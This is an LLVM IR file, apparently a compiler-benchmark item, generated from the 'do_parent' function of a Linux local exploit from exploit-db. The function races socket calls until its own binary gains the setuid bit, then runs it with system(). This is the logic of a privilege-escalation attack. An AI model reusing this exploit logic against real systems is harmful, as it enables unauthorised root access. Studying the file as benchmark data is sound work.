; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_3.c_do_parent.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_3.c_do_parent.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.stat = type { i32 }

@errno = common dso_local global i64 0, align 8
@AF_SECURITY = common dso_local global i32 0, align 4
@SOCK_STREAM = common dso_local global i32 0, align 4
@S_ISUID = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [26 x i8] c"[-] Unable to stat myself\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @do_parent(i8* %0) #0 {
  %2 = alloca i8*, align 8
  %3 = alloca %struct.stat, align 4
  %4 = alloca i32, align 4
  store i8* %0, i8** %2, align 8
  store i64 0, i64* @errno, align 8
  %5 = load i32, i32* @AF_SECURITY, align 4
  %6 = load i32, i32* @SOCK_STREAM, align 4
  %7 = call i32 @socket(i32 %5, i32 %6, i32 1)
  br label %8

8:                                                ; preds = %21, %1
  %9 = load i8*, i8** %2, align 8
  %10 = call i32 @stat(i8* %9, %struct.stat* %3)
  store i32 %10, i32* %4, align 4
  br label %11

11:                                               ; preds = %8
  %12 = load i32, i32* %4, align 4
  %13 = icmp eq i32 %12, 0
  br i1 %13, label %14, label %21

14:                                               ; preds = %11
  %15 = getelementptr inbounds %struct.stat, %struct.stat* %3, i32 0, i32 0
  %16 = load i32, i32* %15, align 4
  %17 = load i32, i32* @S_ISUID, align 4
  %18 = and i32 %16, %17
  %19 = load i32, i32* @S_ISUID, align 4
  %20 = icmp ne i32 %18, %19
  br label %21

21:                                               ; preds = %14, %11
  %22 = phi i1 [ false, %11 ], [ %20, %14 ]
  br i1 %22, label %8, label %23

23:                                               ; preds = %21
  %24 = load i32, i32* %4, align 4
  %25 = icmp eq i32 %24, -1
  br i1 %25, label %26, label %28

26:                                               ; preds = %23
  %27 = call i32 @fatal(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str, i64 0, i64 0))
  br label %28

28:                                               ; preds = %26, %23
  %29 = call i32 @alarm(i32 0)
  %30 = load i8*, i8** %2, align 8
  %31 = call i32 @system(i8* %30)
  ret void
}

declare dso_local i32 @socket(i32, i32, i32) #1

declare dso_local i32 @stat(i8*, %struct.stat*) #1

declare dso_local i32 @fatal(i8*) #1

declare dso_local i32 @alarm(i32) #1

declare dso_local i32 @system(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
